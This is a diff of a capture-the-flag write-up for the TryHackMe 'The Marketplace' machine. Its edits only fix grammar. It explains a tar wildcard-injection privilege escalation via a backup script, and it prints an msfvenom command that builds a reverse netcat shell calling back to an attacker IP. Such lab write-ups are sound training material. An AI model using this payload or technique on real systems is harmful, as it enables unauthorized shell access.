yuvalbatan/writeups/tryhackme/The_Marketplace.md

 ![image](https://user-images.githubusercontent.com/114166939/232226894-10ca44ec-8427-46f9-8638-11d47f4ab6fd.png)

-The content of this bash file means that it will take all the content of the "/opt/backups/" and archive it to the "backup.tar" archive.
+The content of this bash file means that it will take all the content of "/opt/backups/" and archive it to the "backup.tar" archive.

 ![image](https://user-images.githubusercontent.com/114166939/232227008-81441152-846b-47ef-843d-1bd9defa3cf7.png)

 The "backup.sh" file owned by "michael" user and the "backup.tar" owned by "jake" user.

 There is a known vulnerability with the "tar" command and wildcard which also mentioned in GTFOBins ("https://gtfobins.github.io/") under "tar -> Sudo".

 ![image](https://user-images.githubusercontent.com/114166939/232227193-bfd17a2d-ee06-4751-911d-ec6e1d618235.png)

 I'll use this technique to exploit this machine and get access to "michael" user.

 For this purpose I'll use this article "https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/" under "Tar Wildcard Injection (1st method)" and will modify for my own needs:

-I'll start by generate exploit for the reverse shell using "msfvenom" tool:
+I'll start by generating an exploit for the reverse shell using the "msfvenom" tool:
 ```bash
 msfvenom -p cmd/unix/reverse_netcat lhost=[MY-IP] lport=6666 R
 ```